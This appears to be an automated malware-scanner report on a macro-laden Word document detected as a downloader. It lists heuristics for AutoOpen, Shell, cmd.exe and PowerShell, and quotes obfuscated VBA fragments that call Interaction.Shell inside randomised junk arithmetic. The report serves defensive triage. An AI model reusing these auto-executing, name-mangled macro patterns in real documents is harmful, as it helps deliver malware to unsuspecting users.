Verdict: MALICIOUS
Risk score: 292
Heuristics: 10
- ClamAV: Doc.Downloader.Generic-6775056-0 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Generic-6775056-0.
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL). Potential Shell call in VBA. Matched line in script:
  `tlNlMah = Array(uoSIDS, jdjdo, BHnbjzz, Interaction _ .Shell(RrbAu, rGikq), VRDCmHh) bnwfcvrCnEqFcPPlEwwnHFU = 134749510 * CInt(164035308) + KtVwGAfoNNCNuJ + CLng(8717066 + Sgn(dDpduIRHwPVcmWSb) - 41568279 * 174243526) - zhpzpanCBjrDomubRfvHB + Chr(NBqfDBqvaHUYDjoFzDG) * 42391753 / CStr(102372917) / (FLjpsvBwLSjVTnGKWlL / 42360380 / kjQiNmLjrAvMpwf / Fix(NJvuiwBphMBzohVuJPVcQGiI + Hex(QTRoIdrbMIcQMdnibAAlMr) + 66326017 + CBool(209038550 + DaaCiGimEOcjAZ)))`
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN). AutoOpen macro. Matched line in script:
  `Attribute VB_Customizable = True Sub autoopen() KbKzvbVL`
- Suspicious cmd.exe invocation with execution flag (severity: high; rule: SC_STR_CMD). Suspicious cmd.exe invocation with execution flag.
- Reference to PowerShell (severity: high; rule: SC_STR_POWERSHELL). Reference to PowerShell.
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9882 bytes |

SHA-256: d73487beeea6ec614233a5a604522fc6c8a32cdd443d75b4935f64899db80abf

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 227 of 276 identifiers look randomly generated (e.g. 'BvtnDFcJGDWsjUvSizJrRwzU'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script